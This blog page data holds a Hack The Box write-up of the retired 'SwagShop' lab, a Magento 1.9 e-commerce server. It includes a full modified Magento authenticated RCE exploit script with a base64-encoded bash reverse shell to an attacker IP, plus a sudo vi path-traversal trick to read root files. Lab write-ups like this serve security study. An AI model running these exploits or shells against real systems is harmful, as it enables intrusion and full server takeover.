{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-swagshop-en","result":{"data":{"markdownRemark":{"id":"3ef54427-c2a7-5a19-a706-fa934b4475b9","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-swagshop\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy current rank on Hack The Box is ProHacker at the time of writing.</p>\n<p><img src=\"/static/11a078ffa841e1eca64bd701cc6c75d5/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\"></p>\n<p>This is a writeup for the HackTheBox retired machine “SwagShop.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor 
before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote any actions that violate social order.</strong></p>\n<p>Please note in advance that attempting to attack environments you do not own or have not been authorized to access may violate the ‘Act on Prohibition of Unauthorized Computer Access’ (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#obtaining-user-including-root\">Obtaining User (including root)</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" 
focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>Starting with the usual enumeration.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Add the target machine's IP to /etc/hosts (double quotes so $RHOST expands) and run a quick scan</span>\n<span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">\"s/^[0-9].*$RHOST/10.10.10.140  $RHOST/g\"</span> /etc/hosts\nnmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n\n<span class=\"token comment\"># All ports</span>\nnmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p>Port 1717 appears to be open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">PORT     STATE    SERVICE  VERSION\n<span class=\"token number\">22</span>/tcp   <span class=\"token function\">open</span>     <span class=\"token function\">ssh</span>      OpenSSH <span class=\"token number\">7</span>.2p2 Ubuntu 4ubuntu2.8 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token 
number\">2048</span> b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp   <span class=\"token function\">open</span>     http     Apache httpd <span class=\"token number\">2.4</span>.18 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Ubuntu<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Did not follow redirect to http://swagshop.htb/\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.18 <span class=\"token punctuation\">(</span>Ubuntu<span class=\"token punctuation\">)</span>\n<span class=\"token number\">1717</span>/tcp filtered fj-hdnet\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>I’m not sure what service is running on port 1717, but connecting to port 80 shows what appears to be an e-commerce site.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 777px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/edfce11408043310b57600d121f1febb/108f8/image-20220811214853593.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70.83333333333333%; position: relative; bottom: 0; 
left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/edfce11408043310b57600d121f1febb/8ac56/image-20220811214853593.webp 240w,\n/static/edfce11408043310b57600d121f1febb/d3be9/image-20220811214853593.webp 480w,\n/static/edfce11408043310b57600d121f1febb/2e4ba/image-20220811214853593.webp 777w\"\n              sizes=\"(max-width: 777px) 100vw, 777px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/edfce11408043310b57600d121f1febb/8ff5a/image-20220811214853593.png 240w,\n/static/edfce11408043310b57600d121f1febb/e85cb/image-20220811214853593.png 480w,\n/static/edfce11408043310b57600d121f1febb/108f8/image-20220811214853593.png 777w\"\n            sizes=\"(max-width: 777px) 100vw, 777px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/edfce11408043310b57600d121f1febb/108f8/image-20220811214853593.png\"\n            alt=\"image-20220811214853593\"\n            title=\"image-20220811214853593\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The running service appears to be <code class=\"language-text\">Magento, Varien, E-commerce</code>.</p>\n<p>Searching for exploits revealed the following three:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ searchsploit -m xml/webapps/37977.py\n$ searchsploit -m php/webapps/50896.txt\n$ searchsploit -m php/webapps/19793.txt</code></pre></div>\n<p>After trying the <code class=\"language-text\">37977.py</code> exploit, I was able to log into what appears to be the Magento admin panel.</p>\n<p><span\n   
   class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/89048/image-20220812224414951.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 82.08333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/8ac56/image-20220812224414951.webp 240w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/d3be9/image-20220812224414951.webp 480w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/e46b2/image-20220812224414951.webp 960w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/a3537/image-20220812224414951.webp 1242w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/8ff5a/image-20220812224414951.png 240w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/e85cb/image-20220812224414951.png 480w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/d9199/image-20220812224414951.png 960w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/89048/image-20220812224414951.png 1242w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/d9199/image-20220812224414951.png\"\n            alt=\"image-20220812224414951\"\n            title=\"image-20220812224414951\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The portal information revealed the version is 1.9.0, so I used the following exploit.</p>\n<p><a href=\"https://gist.github.com/Mah1ndra/b15db547dfff13696ddd4236dd238e45\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Magento CE &#x3C; 1.9.0.1 - (Authenticated) Remote Code Execution : php/webapps/37811.py · GitHub</a></p>\n<p>However, I couldn’t get a reverse shell with the original code, so I modified it slightly.</p>\n<p>I was ultimately able to get a shell with the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token shebang important\">#!/usr/bin/python</span>\n<span class=\"token comment\"># Exploit Title: Magento CE &lt; 1.9.0.1 Post Auth RCE </span>\n<span class=\"token comment\"># Google Dork: \"Powered by Magento\"</span>\n<span class=\"token comment\"># Date: 08/18/2015</span>\n<span class=\"token comment\"># Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com</span>\n<span class=\"token comment\"># Vendor Homepage: http://magento.com/</span>\n<span class=\"token comment\"># Software Link: https://www.magentocommerce.com/download</span>\n<span class=\"token comment\"># Version: 1.9.0.1 and below</span>\n<span class=\"token comment\"># Tested on: Ubuntu 15</span>\n<span class=\"token comment\"># CVE : none</span>\n\nfrom hashlib <span class=\"token function\">import</span> md5\n<span class=\"token function\">import</span> sys\n<span class=\"token function\">import</span> re\n<span class=\"token function\">import</span> base64\n<span class=\"token function\">import</span> mechanize\n\n\n<span class=\"token comment\"># Command-line args</span>\ntarget <span class=\"token operator\">=</span> <span class=\"token 
string\">\"http://swagshop.htb/index.php/admin/dashboard/index/key/82a57578bfedeb8b93faded780acce0d/\"</span>\nbase <span class=\"token operator\">=</span> <span class=\"token string\">\"L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvNDQ0NCAwPiYxCg==\"</span>\narg <span class=\"token operator\">=</span> <span class=\"token string\">\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvNDQ0NCAwPiYxCg==' | base64 -d | /bin/bash\"</span>\n\n<span class=\"token comment\"># Config.</span>\nusername <span class=\"token operator\">=</span> <span class=\"token string\">'forme'</span>\npassword <span class=\"token operator\">=</span> <span class=\"token string\">'forme'</span>\nphp_function <span class=\"token operator\">=</span> <span class=\"token string\">'system'</span>  <span class=\"token comment\"># Note: we can only pass 1 argument to the function</span>\ninstall_date <span class=\"token operator\">=</span> <span class=\"token string\">'Wed, 08 May 2019 07:23:09 +0000'</span>  <span class=\"token comment\"># This needs to be the exact date from /app/etc/local.xml</span>\n\n<span class=\"token comment\"># POP chain to pivot into call_user_exec</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">'O:8:\\\"Zend_Log\\\":1:{s:11:\\\"\\00*\\00_writers\\\";a:2:{i:0;O:20:\\\"Zend_Log_Writer_Mail\\\":4:{s:16:'</span> <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">'\\\"\\00*\\00_eventsToMail\\\";a:3:{i:0;s:11:\\\"EXTERMINATE\\\";i:1;s:12:\\\"EXTERMINATE!\\\";i:2;s:15:\\\"'</span> <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">'EXTERMINATE!!!!\\\";}s:22:\\\"\\00*\\00_subjectPrependText\\\";N;s:10:\\\"\\00*\\00_layout\\\";O:23:\\\"'</span>     <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">'Zend_Config_Writer_Yaml\\\":3:{s:15:\\\"\\00*\\00_yamlEncoder\\\";s:%d:\\\"%s\\\";s:17:\\\"\\00*\\00'</span>     <span class=\"token 
punctuation\">\\</span>\n          <span class=\"token string\">'_loadedSection\\\";N;s:10:\\\"\\00*\\00_config\\\";O:13:\\\"Varien_Object\\\":1:{s:8:\\\"\\00*\\00_data\\\"'</span> <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">';s:%d:\\\"%s\\\";}}s:8:\\\"\\00*\\00_mail\\\";O:9:\\\"Zend_Mail\\\":0:{}}i:1;i:2;}}'</span> % <span class=\"token punctuation\">(</span>len<span class=\"token punctuation\">(</span>php_function<span class=\"token punctuation\">)</span>, php_function,\n                                                                                     len<span class=\"token punctuation\">(</span>arg<span class=\"token punctuation\">)</span>, arg<span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># Setup the mechanize browser and options</span>\nbr <span class=\"token operator\">=</span> mechanize.Browser<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># br.set_proxies({\"http\": \"localhost:8080\"})</span>\nbr.set_handle_robots<span class=\"token punctuation\">(</span>False<span class=\"token punctuation\">)</span>\n\nrequest <span class=\"token operator\">=</span> br.open<span class=\"token punctuation\">(</span>target<span class=\"token punctuation\">)</span>\n\nbr.select_form<span class=\"token punctuation\">(</span>nr<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\">#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.</span>\nbr.form.fixup<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nbr<span class=\"token punctuation\">[</span><span class=\"token string\">'login[username]'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> username\nbr<span class=\"token punctuation\">[</span><span class=\"token 
string\">'login[password]'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> password\n\nbr.method <span class=\"token operator\">=</span> <span class=\"token string\">\"POST\"</span>\nrequest <span class=\"token operator\">=</span> br.submit<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ncontent <span class=\"token operator\">=</span> request.read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># print(content)</span>\n\nurl <span class=\"token operator\">=</span> re.search<span class=\"token punctuation\">(</span><span class=\"token string\">\"ajaxBlockUrl = \\'(.*)\\'\"</span>, content<span class=\"token punctuation\">)</span>\nurl <span class=\"token operator\">=</span> url.group<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\nkey <span class=\"token operator\">=</span> re.search<span class=\"token punctuation\">(</span><span class=\"token string\">\"var FORM_KEY = '(.*)'\"</span>, content<span class=\"token punctuation\">)</span>\nkey <span class=\"token operator\">=</span> key.group<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n\nrequest <span class=\"token operator\">=</span> br.open<span class=\"token punctuation\">(</span>url + <span class=\"token string\">'block/tab_orders/period/2y/?isAjax=true'</span>, <span class=\"token assign-left variable\">data</span><span class=\"token operator\">=</span><span class=\"token string\">'isAjax=false&amp;form_key='</span> + key<span class=\"token punctuation\">)</span>\ntunnel <span class=\"token operator\">=</span> re.search<span class=\"token punctuation\">(</span><span class=\"token string\">\"src=<span class=\"token entity\" title=\"\\&quot;\">\\\"</span>(.*)\\?ga=\"</span>, request.read<span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">))</span>\ntunnel <span class=\"token operator\">=</span> tunnel.group<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> base64.b64encode<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\ngh <span class=\"token operator\">=</span> md5<span class=\"token punctuation\">(</span>payload + install_date<span class=\"token punctuation\">)</span>.hexdigest<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nexploit <span class=\"token operator\">=</span> tunnel + <span class=\"token string\">'?ga='</span> + payload + <span class=\"token string\">'&amp;h='</span> + gh\n\ntry:\n    request <span class=\"token operator\">=</span> br.open<span class=\"token punctuation\">(</span>exploit<span class=\"token punctuation\">)</span>\nexcept <span class=\"token punctuation\">(</span>mechanize.HTTPError, mechanize.URLError<span class=\"token punctuation\">)</span> as e:\n    print e.read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>However, I only have www-data privileges at this point, so I need to escalate to a user.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 813px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e152c4388960d12645662c44c276bc8f/baaa6/image-20220812233949620.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 29.166666666666668%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABDUlEQVQY04WQW26DMBBF2Q41hvDGgI3NI2CHkKjd/1puBzeK1I+qH0djW9aZOxN0esIwO8JimCyE1FB6gDEGSvWY59EzTQbjqLEsE7btCm0UiqJAlqaIIkZEvgbufofbdxzPB/bjoI8GmoRtK1DXBURToq5yVGX2pqG3PL8gYiF49PEm5iTcbxbbusC5ldhwO+929WnmZYShKtoGUna+yaAV1CBJWiPLMhLnlJQoC/CYk3B3sCQ6q3MWVy/f/GhaS3SdQJpewDn3JEmCOI5/kZwksR87+Px6UBqDvu/Q9T8ppOxRVSUlSH2K8yN77Ykx9icRI6ExmhY+es6zUtI3EEJQkxY1jRaG4Wvp//MNLevHIA9bcgYAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e152c4388960d12645662c44c276bc8f/8ac56/image-20220812233949620.webp 240w,\n/static/e152c4388960d12645662c44c276bc8f/d3be9/image-20220812233949620.webp 480w,\n/static/e152c4388960d12645662c44c276bc8f/90602/image-20220812233949620.webp 813w\"\n              sizes=\"(max-width: 813px) 100vw, 813px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e152c4388960d12645662c44c276bc8f/8ff5a/image-20220812233949620.png 240w,\n/static/e152c4388960d12645662c44c276bc8f/e85cb/image-20220812233949620.png 480w,\n/static/e152c4388960d12645662c44c276bc8f/baaa6/image-20220812233949620.png 813w\"\n            sizes=\"(max-width: 813px) 100vw, 813px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e152c4388960d12645662c44c276bc8f/baaa6/image-20220812233949620.png\"\n            alt=\"image-20220812233949620\"\n            title=\"image-20220812233949620\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"obtaining-user-including-root\" style=\"position:relative;\"><a href=\"#obtaining-user-including-root\" aria-label=\"obtaining user including root permalink\" class=\"anchor before\"><svg 
aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Obtaining User (including root)</h2>\n<p>I logged into MySQL using credentials extracted from config.php and dumped the user table, where I found a user named ‘haris’.</p>\n<p><img src=\"/static/9f71cc4238ff25cc37651049c7e23580/d9199/image-20220812235356430.png\" alt=\"image-20220812235356430\" title=\"image-20220812235356430\"></p>\n<p>However, even after running this password hash through hashcat, I couldn’t recover the password.</p>\n<p>Next, I noticed that www-data had the following sudo permission:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">www-data <span class=\"token assign-left variable\">ALL</span><span class=\"token operator\">=</span>NOPASSWD:/usr/bin/vi /var/www/html/*</code></pre></div>\n<p>This allows vi to be run with sudo on files under <code class=\"language-text\">/var/www/html/</code>, but interestingly, a path that climbs back out of that directory with <code class=\"language-text\">..</code> still matches the rule, so any file on the system can be opened with root privileges. The <code class=\"language-text\">*</code> sits in the argument part of the sudoers entry, and wildcards in sudoers arguments also match <code class=\"language-text\">/</code>, so the traversal path satisfies the rule as written (sudo does not canonicalize the argument):</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> /usr/bin/vi /var/www/html/../../../../../../home/haris/user.txt\n$ <span class=\"token function\">sudo</span> /usr/bin/vi /var/www/html/../../../../../../root/root.txt</code></pre></div>\n<p>This allowed me to easily obtain all the flags.</p>","fields":{"slug":"/hackthebox-linux-swagshop-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-11","description":"Writeup for the HackTheBox retired machine 'SwagShop'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"【Easy/Linux】SwagShop Writeup(HackTheBox)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-swagshop-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}